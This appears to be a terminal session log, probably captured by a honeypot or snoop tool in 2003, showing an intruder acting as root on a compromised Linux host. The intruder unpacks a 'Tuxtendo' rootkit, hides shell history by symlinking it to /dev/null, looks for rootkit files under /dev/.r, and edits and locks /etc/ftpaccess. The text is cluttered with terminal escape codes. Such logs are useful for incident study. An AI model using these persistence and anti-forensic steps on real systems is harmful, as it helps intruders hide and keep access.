root 13052 0.0 2.4 3320 1544 ? S 11:10 0:00 /bin/data_mining
root 13076 51.6 0.6 1520 400 ? R 11:10 5:05 /bin/mingetty ttyp1
root 13077 0.0 1.0 1972 672 ? S 11:10 0:00 /bin/number_cum -w 1
root 13081 0.0 1.8 2160 1160 p1 S 11:10 0:00 /bin/sh
root 13090 0.0 1.4 2072 932 p1 S 11:10 0:00 su
root 13092 0.0 2.3 2840 1480 p1 S 11:10 0:00 -csh
root 13109 0.0 0.8 1540 524 p1 S 11:10 0:00 /sbin/bash
root 13110 0.0 2.1 2388 1332 p2 S 11:10 0:00 /bin/bash
root 13143 0.0 2.5 3320 1564 ? S 11:10 0:00 /bin/data_mining
root 13167 49.9 0.6 1520 400 ? R 11:10 4:43 /bin/mingetty ttyp2
root 13168 0.0 1.0 1972 672 ? S 11:10 0:00 /bin/number_cum -w 1
root 13198 0.0 0.4 1364 308 p2 S 11:13 0:00 ps -aux
root 13221 0.0 0.4 1344 304 p2 T 11:15 0:00 ln -s /dev/null .bash
root 13222 0.0 0.0 0 0 p2 Z 11:15 0:00 [ln ]
root 13249 0.0 0.5 1644 344 p2 T 11:16 0:00 awk -F {print $2}
root 13253 0.0 0.0 0 0 p2 Z 11:16 0:00 [awk ]
root 13266 0.0 1.1 1476 700 p2 R 11:20 0:00 ps -aux
root 13267 0.0 0.4 1364 308 p2 R 11:20 0:00 ps -aux
root 13268 0.0 0.4 1364 308 p2 R 11:20 0:00 ps -aux
rpcuser 591 0.0 0.4 1568 264 ? S Feb 21 0:00 rpc.statd
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# killall -9 awk mv cp rm
cp: no process killed
rm: no process killed
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# w
11:20am up 3 days, 20:59, 1 user, load average: 1.86, 1.64, 0.89
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mssql pts/2 astound-64-85-22 11:10am 1.00s 0.05s 0.03s -bash
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# ls -al
total 2604
drwxr-xr-x 2 933 cheerie 4096 Feb 25 10:17 �[01;34m.�[00m
drwxr-x--- 6 root root 4096 Feb 25 11:16 �[01;34m..�[00m
-rw------- 1 933 cheerie 502884 Dec 5 2001 �[01;31mbin.tgz�[00m
-rw------- 1 933 cheerie 1096 Feb 25 10:13 �[01;31mcfg.tgz�[00m
-rw------- 1 933 cheerie 16213 Dec 5 2001 �[01;31mlib.tgz�[00m
-rw------- 1 933 cheerie 461768 Feb 25 10:16 �[01;31msshd.tgz�[00m
-rw------- 1 933 cheerie 1644819 Dec 5 2001 �[01;31mtools.tgz�[00m
-rwx------ 1 933 cheerie 9487 Feb 25 09:33 �[01;32mtuxkit�[00m
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# ./tuxkit� �� �� �� �� �� �� �� ����������ls -al
total 2604
drwxr-xr-x 2 933 cheerie 4096 Feb 25 10:17 �[01;34m.�[00m
drwxr-x--- 6 root root 4096 Feb 25 11:16 �[01;34m..�[00m
-rw------- 1 933 cheerie 502884 Dec 5 2001 �[01;31mbin.tgz�[00m
-rw------- 1 933 cheerie 1096 Feb 25 10:13 �[01;31mcfg.tgz�[00m
-rw------- 1 933 cheerie 16213 Dec 5 2001 �[01;31mlib.tgz�[00m
-rw------- 1 933 cheerie 461768 Feb 25 10:16 �[01;31msshd.tgz�[00m
-rw------- 1 933 cheerie 1644819 Dec 5 2001 �[01;31mtools.tgz�[00m
-rwx------ 1 933 cheerie 9487 Feb 25 09:33 �[01;32mtuxkit�[00m
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# ./tuxkit k3wlm3 3432 8008
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# sh tuxkit k3wlm3 3432 8008
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# pico tuxkit
pico: error while loading shared libraries: libncurses.so.4: cannot load shared object file: No such file or directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# vi tuxkit
�[?25l�[?1048h�[?1047h�[?1h�=�[1;24r�[?25h�[?25h�[H�[2J�[24;1H"tuxkit" 373L, 9487C�[1;1H#!/bin/sh
# Tuxtendo Linux Rootkit v1.0 By Argv[]
# Your e-mail address
EMAIL="[--delete--]@yahoo.com"
# You don't need to edit anything below this
BLK='\033[1;30m'
RED='\033[1;31m'
GRN='\033[1;32m'
YEL='\033[1;33m'
BLU='\033[1;34m'
MAG='\033[1;35m'
CYN='\033[1;36m'
WHI='\033[1;37m'
DRED='\033[0;31m'
DGRN='\033[0;32m'
DYEL='\033[0;33m'
DBLU='\033[0;34m'
DMAG='\033[0;35m'
DCYN='\033[0;36m'
DWHI='\033[0;37m'�[1;1H�[?25h��[?25l!/bin/sh�[1;9H�[K�[1;1H�[?25h���[?25l�[24;1H�[K�[24;1H:�[?25hq!�[?25l�[?1l�>�[?25h�[?1047l�[?1048l�[J�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# xfs
bash: xfs: command not found
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# locate xfs
locate: warning: database `/usr/local/var/locatedb' is more than 8 days old
locate: /usr/local/var/locatedb: Is a directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# whereis xfs
xfs: /usr/X11R6/bin/xfs /usr/bin/X11/xfs
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# /usr/X11R6/bin/xfs
FontCacheInitialize: hi=1048576, lo=786432, bal=70
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# /usr/bin/X11/xfs
FontCacheInitialize: hi=1048576, lo=786432, bal=70
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# /usr/bin/xsf � �
bash: /usr/bin/xsf: No such file or directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# /usr/bin/xchk
bash: /usr/bin/xchk: No such file or directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# whereis xsf
xsf:
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# cd /dev/.tux
bash: cd: /dev/.tux: No such file or directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# whereis tux
tux: /usr/sbin/tux /usr/include/tux.h /usr/share/man/man2/tux.2.gz
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# .//usr/sbin/tux
bash: .//usr/sbin/tux: No such file or directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# /usr/sbin/tux
Could not find user name "nobody"
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# cd /dev/tux
bash: cd: /dev/tux: No such file or directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# cd /dev
�]0;root@pc88: /dev�[root@pc88 /dev]# find | grep tux
./.r/etc/rc.d/init.d/tux
�]0;root@pc88: /dev�[root@pc88 /dev]# cd /dev/tux
bash: cd: /dev/tux: No such file or directory
�]0;root@pc88: /dev�[root@pc88 /dev]# cd ./.r/etc/rc.d/init.d/tux
bash: cd: ./.r/etc/rc.d/init.d/tux: Not a directory
�]0;root@pc88: /dev�[root@pc88 /dev]# cd .r/etc/rc.d/init.d/tux
bash: cd: .r/etc/rc.d/init.d/tux: Not a directory
�]0;root@pc88: /dev�[root@pc88 /dev]# cat .r/etc/rc.d/init.d/tux
#! /bin/sh
#
# tux This starts and stops the TUX kernel-based http server.
#
# chkconfig: - 50 50
# description: The TUX threaded kernel-based http server
#
# processname: /usr/sbin/tux
# config: /etc/sysconfig/tux
# config: /etc/sysctl.conf
# Source function library.
. /etc/rc.d/init.d/functions
# Set defaults
NRCPUS=$(cat /proc/cpuinfo | grep '^processor[ ]*:' | wc -l)
TUXTHREADS=$NRCPUS
EXTRAOPTS=
# Get config.
. /etc/sysconfig/network
. /etc/sysconfig/tux
# Check that networking is up.
if [ ${NETWORKING} = "no" ]
then
exit 0
fi
# DOCROOT should have precisely one trailing /
[ -z "$DOCROOT" ] && {
echo "Must specify a docroot in /etc/sysconfig/tux" 1>&2
exit 1
}
DOCROOT=$(echo $DOCROOT | sed 's:/*$:/:g')
[ -n "$MODULEPATH" ] && {
EXTRAOPTS="$EXTRAOPTS -m $MODULEPATH"
}
[ -n "$DAEMON_UID" ] && EXTRAOPTS="$EXTRAOPTS -u $DAEMON_UID"
[ -n "$DAEMON_GID" ] && EXTRAOPTS="$EXTRAOPTS -g $DAEMON_GID"
isname(){
[ -n "$(echo $1 | tr -d '0-9')" ]
return $?
}
[ -z "$CGI_UID" ] && CGI_UID=nobody
isname $CGI_UID && CGI_UID=$(id -u $CGI_UID)
[ -z "$CGI_GID" ] && CGI_GID=nobody
isname $CGI_GID && CGI_GID=$(awk -F: "\$1 == \"$CGI_GID\" { print \$3 }" /etc/group)
[ -z "$CGIROOT" ] && CGIROOT=$DOCROOT
[ -z "$MAX_KEEPALIVE_TIMEOUT" ] && MAX_KEEPALIVE_TIMEOUT=30
[ -f /usr/sbin/tux ] || exit 1
RETVAL=0
start(){
echo -n "Starting tux: "
# TUX ships as a module but many installations will build
# it into the kernel for maximum performance. Try to modprobe
# but failures are fine.
modprobe tux >/dev/null 2>&1
echo $TUXTHREADS > /proc/sys/net/tux/threads
echo $DOCROOT > /proc/sys/net/tux/documentroot
echo $CGI_UID > /proc/sys/net/tux/cgi_uid
echo $CGI_GID > /proc/sys/net/tux/cgi_gid
echo $CGIROOT > /proc/sys/net/tux/cgiroot
echo $MAX_KEEPALIVE_TIMEOUT > /proc/sys/net/tux/keepalive_timeout
daemon /usr/sbin/tux -d -t $TUXTHREADS -r $DOCROOT $EXTRAOPTS $TUXMODULES
RETVAL=$?
echo
touch /var/lock/subsys/tux
}
stop(){
echo -n "Stopping tux: "
/usr/sbin/tux --stop
RETVAL=$?
echo
rm -f /var/lock/subsys/tux
}
restart(){
stop
start
}
condrestart(){
[ -e /var/lock/subsys/tux ] && restart
}
# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status /usr/sbin/tux
;;
restart|reload)
restart
;;
condrestart)
condrestart
;;
*)
echo "Usage: tux {start|stop|status|restart|condrestart|reload}"
RETVAL=1
esac
exit $RETVAL
�]0;root@pc88: /dev�[root@pc88 /dev]# clear
�[H�[2J�]0;root@pc88: /dev�[root@pc88 /dev]# whereis tools
tools:
�]0;root@pc88: /dev�[root@pc88 /dev]# vi /etc/ftpaccess
�[?25l�[?1048h�[?1047h�[?1h�=�[1;24r�[?25h�[?25h�[H�[2J�[24;1H"/etc/ftpaccess" 69L, 1748C�[1;1H# This file controls the behavior of the wu-ftpd
# ftp server.
#
# If you're looking for a graphical frontend to
# editing it, try kwuftpd from the kdeadmin
# package.
# Don't allow system accounts to log in over ftp
deny-uid %-99 %65534-
deny-gid %-99 %65534-
allow-uid ftp
allow-gid ftp
# The ftpchroot group doesn't exist by default, this
# entry is just supplied as an example.
# To chroot a user, modify the line below or create
# the ftpchroot group and add the user to it.
#
# You will need to setup the required applications
# and libraries in the root directory (set using
# guest-root).
#
# Look at the anonftp package for the files you'll need.�[1;1H�[?25h
�[?25l�[1;23r�[23;1H
�[1;24r�[23;1Hguestgroup ftpchroot�[?25h�[24;1H�[K�[?25l�[1;23r�[23;1H
�[1;24r�[23;1H�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1H# User classes...�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1Hclass all real,guest,anonymous *�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1H�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1H# Set this to your email address�[?25h�[?25l
:�[?25h/anonymous�[?25l�[H�[2J�[1;1Hreadme README* login
readme README* cwd=*
# Messages displayed to the user
message /welcome.msg�[12Clogin
message .message�[16Ccwd=*
# Allow on-the-fly compression and tarring
compress�[8Cyes�[13Call
tar�[13Cyes�[13Call
# Prevent anonymous users (and partially guest users)
# from executing dangerous commands
chmod�[11Cno�[14Cguest,anonymous
delete�[10Cno�[14Canonymous
overwrite�[7Cno�[14Canonymous
rename�[10Cno�[14Canonymous
# Turn on logging to /var/log/xferlog
log transfers anonymous,guest,real inbound,outbound
# If /etc/shutmsg exists, don't allow logins
# see ftpshut man page�[12;1H�[?25h
�[13;1H�[12;1H�[11;1H�[10;1H�[9;1H�[8;1H�[7;1H�[6;1H�[5;1H�[4;1H�[3;1H�[2;1H�[1;1H�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# changing to a different directory�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# Notify the users of README files at login and when�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hloginfails 5�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# Allow 5 mistyped passwords�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hemail root@localhost�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# Set this to your email address�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hclass all real,guest,anonymous *�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# User classes...�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hguestgroup ftpchroot�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# Look at the anonftp package for the files you'll need.�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H#��[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# guest-root).�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# and libraries in the root directory (set using�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# You will need to setup the required applications�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H#��[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# the ftpchroot group and add the user to it.�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# To chroot a user, modify the line below or create�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# entry is just supplied as an example.�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# The ftpchroot group doesn't exist by default, this�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hallow-gid ftp�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hallow-uid ftp�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hdeny-gid %-99 %65534-�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1Hdeny-uid %-99 %65534-�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# Don't allow system accounts to log in over ftp�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# package.�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# editing it, try kwuftpd from the kdeadmin�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# If you're looking for a graphical frontend to�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H#��[?25h
�[11;1H�[10;1H�[9;1H�[8;1H�[7;1H�[6;1H�[5;1H�[4;1H�[3;1H�[2;1H�[1;1H�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# ftp server.�[?25h�[?25l�[1;23r�[1;1H�[L�[1;24r�[1;1H# This file controls the behavior of the wu-ftpd�[?25h������
�[?25l�[1;23r�[23;1H
�[1;24r�[23;1Hguestgroup ftpchroot�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1H�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1H# User classes...�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1Hclass all real,guest,anonymous *�[?25h�[?25l�[1;23r�[23;1H
�[1;24r�[23;1H�[?25h��[22;1Hclass all real,guest,an���[?25lnonymous *�[22;37H�[K�[22;26H�[?25h�[?25lonymous *�[22;36H�[K�[22;26H�[?25h�[?25lnymous *�[22;35H�[K�[22;26H�[?25h�[?25lymous *�[22;34H�[K�[22;26H�[?25h�[?25lmous *�[22;33H�[K�[22;26H�[?25h�[?25lous *�[22;32H�[K�[22;26H�[?25h�[?25lus *�[22;31H�[K�[22;26H�[?25h�[?25ls *�[22;30H�[K�[22;26H�[?25h�[?25l *�[22;29H�[K�[22;26H�[?25h�[?25l *�[22;28H�[K�[22;26H�[?25h��[?25l
:�[?25hwq�[?25l"/etc/ftpaccess" 69L, 1738C written�[?1l�>�[?25h�[?1047l�[?1048l�[J�]0;root@pc88: /dev�[root@pc88 /dev]# chattr +iau /etc/ftpaccess
�]0;root@pc88: /dev�[root@pc88 /dev]#
Back at local tty.
end at Tue Feb 25 11:41:54 HKT 2003
----------------------------------
Tue Feb 25 12:41:50 HKT 2003
================================
Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
Back at local tty.
end at Tue Feb 25 12:42:09 HKT 2003
----------------------------------